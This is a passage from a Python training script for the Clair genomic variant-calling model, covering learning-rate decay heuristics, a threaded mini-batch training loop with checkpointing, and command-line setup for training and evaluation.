    # True when the last six validation losses strictly alternate in a
    # zig-zag (down-up-down-up... or up-down-up-down...) — used as a signal
    # that the learning rate should decay. Needs more than six data points.
    if len(validation_losses) <= 6:
        return False
    return (
        validation_losses[-6][0] > validation_losses[-5][0] and
        validation_losses[-5][0] < validation_losses[-4][0] and
        validation_losses[-4][0] > validation_losses[-3][0] and
        validation_losses[-3][0] < validation_losses[-2][0] and
        validation_losses[-2][0] > validation_losses[-1][0]
    ) or (
        validation_losses[-6][0] < validation_losses[-5][0] and
        validation_losses[-5][0] > validation_losses[-4][0] and
        validation_losses[-4][0] < validation_losses[-3][0] and
        validation_losses[-3][0] > validation_losses[-2][0] and
        validation_losses[-2][0] < validation_losses[-1][0]
    )


def is_validation_losses_keep_increasing(validation_losses):
    # True when none of the last five epochs reached the overall minimum,
    # i.e. validation loss has stayed strictly above its historical best —
    # another trigger for learning-rate decay.
    if len(validation_losses) <= 6:
        return False
    minimum_validation_loss = min(np.asarray(validation_losses)[:, 0])
    return (
        validation_losses[-5][0] > minimum_validation_loss and
        validation_losses[-4][0] > minimum_validation_loss and
        validation_losses[-3][0] > minimum_validation_loss and
        validation_losses[-2][0] > minimum_validation_loss and
        validation_losses[-1][0] > minimum_validation_loss
    )


def shuffle_first_n_items(array, n):
    """
    Shuffle first n items on given array.

    Items from index n onward keep their original order; if the array has
    no more than n items, the whole array is shuffled instead.
    """
    if len(array) <= n:
        np.random.shuffle(array)
        return array
    # pylint: disable=unbalanced-tuple-unpacking
    a1, a2 = np.split(array, [n])
    np.random.shuffle(a1)
    return np.append(a1, a2)


def train_model(m, training_config):
    """Train model *m* according to *training_config*.

    Iterates epochs over blosc-blocked mini batches: the first
    no_of_training_examples examples are used for training, the remainder
    for validation. Each model train/validate step runs on a thread while
    the next mini batch is loaded, overlapping compute with I/O. After
    every epoch the parameters are checkpointed and an adaptive
    learning-rate decay is applied when validation loss oscillates or
    keeps increasing; training stops after param.maxLearningRateSwitch
    decays.

    Returns (training_losses, validation_losses), each a list of
    (loss_sum, epoch_count) tuples.
    """
    learning_rate = training_config.learning_rate
    l2_regularization_lambda = training_config.l2_regularization_lambda
    output_file_path_prefix = training_config.output_file_path_prefix
    summary_writer = training_config.summary_writer
    model_initalization_file_path = training_config.model_initalization_file_path

    dataset_info = training_config.dataset_info
    dataset_size = dataset_info.dataset_size

    training_losses = []
    validation_losses = []

    # Optionally resume from a previously saved checkpoint.
    if model_initalization_file_path is not None:
        m.restore_parameters(os.path.abspath(model_initalization_file_path))

    logging.info("[INFO] Start training...")
    logging.info("[INFO] Learning rate: %.2e" % m.set_learning_rate(learning_rate))
    logging.info("[INFO] L2 regularization lambda: %.2e" % m.set_l2_regularization_lambda(l2_regularization_lambda))

    # Model Constants
    training_start_time = time()
    learning_rate_switch_count = param.maxLearningRateSwitch
    # Training/validation split: either taken from a dedicated train
    # binary, or a fixed percentage of the whole dataset.
    no_of_training_examples = (
        dataset_info.no_of_training_examples_from_train_binary or
        int(dataset_size * param.trainingDatasetPercentage)
    )
    no_of_validation_examples = dataset_info.dataset_size - no_of_training_examples
    no_of_blosc_blocks = utils.no_of_blosc_blocks_from(
        dataset_info=dataset_info,
        no_of_training_examples=no_of_training_examples,
        blosc_block_size=param.bloscBlockSize
    )
    # Only the training prefix of the block index list is reshuffled each
    # epoch; validation blocks keep their order.
    no_of_training_blosc_blocks = int(no_of_training_examples / param.bloscBlockSize)
    tensor_block_index_list = np.arange(no_of_blosc_blocks, dtype=int)

    # Initialize variables
    epoch_count = 1
    if model_initalization_file_path is not None:
        # Resume epoch numbering from the checkpoint file-name suffix
        # (the zero-padded epoch number at the end of the path).
        epoch_count = int(model_initalization_file_path[-param.parameterOutputPlaceHolder:]) + 1

    epoch_start_time = time()
    training_loss_sum = 0
    validation_loss_sum = 0
    no_of_epochs_with_current_learning_rate = 0

    # Variables for learning rate decay
    data_index = 0
    blosc_index = 0
    first_blosc_block_data_index = 0
    x_batch = None
    y_batch = None
    gt21_loss_sum = 0
    genotype_loss_sum = 0
    indel_length_loss_sum_1 = 0
    indel_length_loss_sum_2 = 0
    l2_loss_sum = 0

    while True:
        # Examples before the split index are training data, after it
        # validation data.
        is_training = data_index < no_of_training_examples
        is_validation = not is_training
        # On the very first iteration (and at each epoch restart) there is
        # no batch yet — only prefetch happens then.
        is_with_batch_data = x_batch is not None and y_batch is not None

        # logging.info("{} {} {} {} {}".format("TRAIN" if is_training else "VALID", data_index, first_blosc_block_data_index, blosc_index, no_of_training_examples))

        # threads for either train or validation
        thread_pool = []
        if is_with_batch_data and is_training:
            thread_pool.append(Thread(target=m.train, args=(x_batch, y_batch)))
        elif is_with_batch_data and is_validation:
            thread_pool.append(Thread(target=m.validate, args=(x_batch, y_batch)))
        for t in thread_pool:
            t.start()

        # Load the next mini batch in parallel with the model step above.
        next_x_batch, next_y_batch, next_first_blosc_block_data_index, next_blosc_start_index = utils.new_mini_batch(
            data_index=data_index,
            blosc_start_index=blosc_index,
            first_blosc_block_data_index=first_blosc_block_data_index,
            no_of_training_examples=no_of_training_examples,
            no_of_blosc_blocks=no_of_blosc_blocks,
            dataset_info=dataset_info,
            tensor_block_index_list=tensor_block_index_list,
        )

        # wait until loaded next mini batch & finished training/validation with current mini batch
        for t in thread_pool:
            t.join()

        # add training loss or validation loss
        if is_with_batch_data and is_training:
            training_loss_sum += m.training_loss_on_one_batch
            if summary_writer is not None:
                summary = m.training_summary_on_one_batch
                summary_writer.add_summary(summary, epoch_count)
        elif is_with_batch_data and is_validation:
            validation_loss_sum += m.validation_loss_on_one_batch
            # Per-task loss components, reported at epoch end.
            gt21_loss_sum += m.gt21_loss
            genotype_loss_sum += m.genotype_loss
            indel_length_loss_sum_1 += m.indel_length_loss_1
            indel_length_loss_sum_2 += m.indel_length_loss_2
            l2_loss_sum += m.l2_loss

        # Advance cursors to where the prefetched batch left off.
        batch_size = np.shape(next_x_batch)[0]
        data_index += batch_size
        blosc_index = next_blosc_start_index
        first_blosc_block_data_index = next_first_blosc_block_data_index

        # if not go through whole dataset yet, continue the process
        # (negative indices from new_mini_batch signal end of dataset).
        if next_first_blosc_block_data_index >= 0 and next_blosc_start_index >= 0:
            x_batch = next_x_batch
            y_batch = next_y_batch
            continue

        # logging.info("{} {} {} {} {}".format("END", data_index, first_blosc_block_data_index, blosc_index, no_of_training_examples))

        # --- end of epoch: report losses ---
        logging.info(
            " ".join([str(epoch_count), "Training loss:", str(training_loss_sum/no_of_training_examples)])
        )
        logging.info(
            "\t".join([
                "{} Validation loss (Total/Base/Genotype/Indel_1_2):".format(epoch_count),
                str(validation_loss_sum/no_of_validation_examples),
                str(gt21_loss_sum/no_of_validation_examples),
                str(genotype_loss_sum/no_of_validation_examples),
                str(indel_length_loss_sum_1/no_of_validation_examples),
                str(indel_length_loss_sum_2/no_of_validation_examples)
            ])
        )
        logging.info("[INFO] Epoch time elapsed: %.2f s" % (time() - epoch_start_time))

        training_losses.append((training_loss_sum, epoch_count))
        validation_losses.append((validation_loss_sum, epoch_count))

        # Output the model
        if output_file_path_prefix is not None:
            # e.g. "<prefix>-%06d" -> zero-padded epoch number suffix.
            parameter_output_path = "%s-%%0%dd" % (output_file_path_prefix, param.parameterOutputPlaceHolder)
            m.save_parameters(os.path.abspath(parameter_output_path % epoch_count))

        # Adaptive learning rate decay
        no_of_epochs_with_current_learning_rate += 1
        need_learning_rate_update = (
            (
                no_of_epochs_with_current_learning_rate >= 6 and
                not is_last_five_epoch_approaches_minimum(validation_losses) and
                is_validation_loss_goes_up_and_down(validation_losses)
            ) or (
                no_of_epochs_with_current_learning_rate >= 8 and
                is_validation_losses_keep_increasing(validation_losses)
            )
        )
        if need_learning_rate_update:
            learning_rate_switch_count -= 1
            # Stop training entirely once the learning rate has been
            # decayed the maximum number of times.
            if learning_rate_switch_count == 0:
                break
            logging.info("[INFO] New learning rate: %.2e" % m.decay_learning_rate())
            logging.info("[INFO] New L2 regularization lambda: %.2e" % m.decay_l2_regularization_lambda())
            no_of_epochs_with_current_learning_rate = 0

        # variables update per epoch
        epoch_count += 1
        epoch_start_time = time()
        training_loss_sum = 0
        validation_loss_sum = 0
        data_index = 0
        blosc_index = 0
        first_blosc_block_data_index = 0
        x_batch = None
        y_batch = None
        gt21_loss_sum = 0
        genotype_loss_sum = 0
        indel_length_loss_sum_1 = 0
        indel_length_loss_sum_2 = 0
        l2_loss_sum = 0

        # shuffle data on each epoch (training blocks only; see above)
        tensor_block_index_list = shuffle_first_n_items(tensor_block_index_list, no_of_training_blosc_blocks)
        logging.info("[INFO] Shuffled: " + ' '.join(
            [str(x) for x in np.append(tensor_block_index_list[:5], tensor_block_index_list[-5:])]
        ))

    logging.info("[INFO] Training time elapsed: %.2f s" % (time() - training_start_time))

    return training_losses, validation_losses


def main():
    """Parse CLI arguments, train a Clair model, then evaluate the
    checkpoint with the smallest validation loss."""
    # Fixed seeds for reproducible shuffling/initialization.
    random.seed(param.RANDOM_SEED)
    np.random.seed(param.RANDOM_SEED)

    parser = ArgumentParser(description="Train model")

    # optimizer
    parser.add_argument('--SGDM', action='store_true',
                        help="Use Stochastic Gradient Descent with momentum as optimizer")
    parser.add_argument('--Adam', action='store_true',
                        help="Use Adam as optimizer")

    # loss function
    parser.add_argument('--cross_entropy', action='store_true',
                        help="Use Cross Entropy as loss function")
    parser.add_argument('--focal_loss', action='store_true',
                        help="Use Focal Loss as loss function")

    # binary file path
    parser.add_argument('--bin_fn', type=str, default=None,
                        help="Binary tensor input generated by tensor2Bin.py, tensor_fn, var_fn and bed_fn will be ignored")
    parser.add_argument('--train_bin_fn', type=str, default=None,
                        help="Train Binary, used together with --validation_bin_fn (would ignore: bin_fn, tensor_fn, var_fn, bed_fn)")
    parser.add_argument('--validation_bin_fn', type=str, default=None,
                        help="Validation Binary, used together with --train_bin_fn (would ignore: bin_fn, tensor_fn, var_fn, bed_fn)")

    # tensor file path
    parser.add_argument('--tensor_fn', type=str, default="vartensors",
                        help="Tensor input")

    # variant file path
    parser.add_argument('--var_fn', type=str, default="truthvars",
                        help="Truth variants list input")

    # bed file path
    parser.add_argument('--bed_fn', type=str, default=None,
                        help="High confident genome regions input in the BED format")

    # checkpoint file path
    parser.add_argument('--chkpnt_fn', type=str, default=None,
                        help="Input a checkpoint for testing or continue training")

    # learning rate, with default value stated in param
    parser.add_argument('--learning_rate', type=float, default=param.initialLearningRate,
                        help="Set the initial learning rate, default: %(default)s")

    # l2 regularization
    parser.add_argument('--lambd', type=float, default=param.l2RegularizationLambda,
                        help="Set the l2 regularization lambda, default: %(default)s")

    # output checkpoint file path prefix
    parser.add_argument('--ochk_prefix', type=str, default=None,
                        help="Prefix for checkpoint outputs at each learning rate change, REQUIRED")
    parser.add_argument('--olog_dir', type=str, default=None,
                        help="Directory for tensorboard log outputs, optional")

    args = parser.parse_args()

    # Print usage and exit when invoked without any arguments.
    if len(sys.argv[1:]) == 0:
        parser.print_help()
        sys.exit(1)

    # initialize
    logging.info("[INFO] Initializing")
    utils.setup_environment()

    # CLI flags override the project defaults from shared.param.
    optimizer = "SGDM" if args.SGDM else ("Adam" if args.Adam else param.default_optimizer)
    loss_function = (
        "FocalLoss" if args.focal_loss else ("CrossEntropy" if args.cross_entropy else param.default_loss_function)
    )
    logging.info("[INFO] Optimizer: {}".format(optimizer))
    logging.info("[INFO] Loss Function: {}".format(loss_function))

    m = Clair(
        optimizer_name=optimizer,
        loss_function=loss_function
    )
    m.init()

    dataset_info = utils.dataset_info_from(
        binary_file_path=args.bin_fn,
        tensor_file_path=args.tensor_fn,
        variant_file_path=args.var_fn,
        bed_file_path=args.bed_fn,
        train_binary_file_path=args.train_bin_fn,
        validation_binary_file_path=args.validation_bin_fn,
    )
    training_config = utils.TrainingConfig(
        dataset_info=dataset_info,
        learning_rate=args.learning_rate,
        l2_regularization_lambda=args.lambd,
        output_file_path_prefix=args.ochk_prefix,
        model_initalization_file_path=args.chkpnt_fn,
        summary_writer=m.get_summary_file_writer(args.olog_dir) if args.olog_dir != None else None,
    )

    _training_losses, validation_losses = train_model(m, training_config)

    # show the parameter set with the smallest validation loss
    # (tuples are (loss_sum, epoch), so sorting orders by loss first).
    validation_losses.sort()
    best_validation_epoch = validation_losses[0][1]
    logging.info("[INFO] Best validation loss at epoch: %d" % best_validation_epoch)

    # load best validation model and evaluate it
    model_file_path = "%s-%%0%dd" % (training_config.output_file_path_prefix, param.parameterOutputPlaceHolder)
    best_validation_model_file_path = model_file_path % best_validation_epoch
    m.restore_parameters(os.path.abspath(best_validation_model_file_path))
    evaluate.evaluate_model(m, dataset_info)


if __name__ == "__main__":
    main()